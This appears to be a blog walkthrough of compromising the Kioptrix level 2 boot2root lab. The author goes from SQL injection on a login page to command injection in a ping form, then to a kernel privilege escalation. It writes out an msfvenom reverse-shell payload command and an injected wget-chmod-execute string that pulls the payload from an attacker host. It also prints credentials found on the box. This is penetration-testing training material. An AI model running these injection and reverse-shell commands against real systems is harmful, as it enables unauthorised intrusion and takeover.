As part of my series of blogs detailing how to compromise the Kioptrix series of boot2root challenges, today I’ll be documenting one method of compromising the second box.
Similar to box #1, in terms of available ports –
- CUPS (interesting..!)
- RPC Status
This box isn’t as straight forward as the last one, there’s not just a vulnerable service running on the box which we can exploit to get root from. This version of CUPS isn’t exploitable, the SSH and MySQL instances don’t have easily guessable passwords and this version of the CUPS printer service isn’t remotely exploitable.
Navigating to port 80 we see a very basic login page. After experimenting with basic login combinations I tried SQL injection as an attack vector and got lucky –
Which leads us to a panel where we can enter an IP address to ping a host.. which immediately screams command injection vulnerability, as evidenced by –
Cool! Worth noting that this is a very old kernel version, which will come in handy later for exploitation.
Next step is to leverage this vulnerability to get a shell on the box. I used:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=53535 -f elf > /var/www/html/shell.elf
To create the shell (also started the associated handler in msfconsole) and:
; cd /tmp ; wget 192.168.56.102/shell.elf ; chmod +x shell.elf ; ./shell.elf
To connect back to our attacker machine.
Rooting the Box
At this point, we can run searchsploit on our attacker machine to find a kernel exploit to escalate our privileges to root.
Using the following command I found one which worked for me –
Which yielded the following –
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) – ‘sock_sendpage()’ Ring0 Privilege Escalation (5) | exploits/linux/local/9479.c
We put 9479.c into our /var/www/html directory and wget it onto the victim machine in the /tmp directory and compile it as normal with gcc sploit.c -o sploit and run it.
Once you’ve successfully got a shell on the box, catting the index.php file gives you some credentials for the database (john / hiroshima). Connecting to the “webapp” database and selecting * from the users table yields the following –
So now we’ve got valid app credentials for future usage.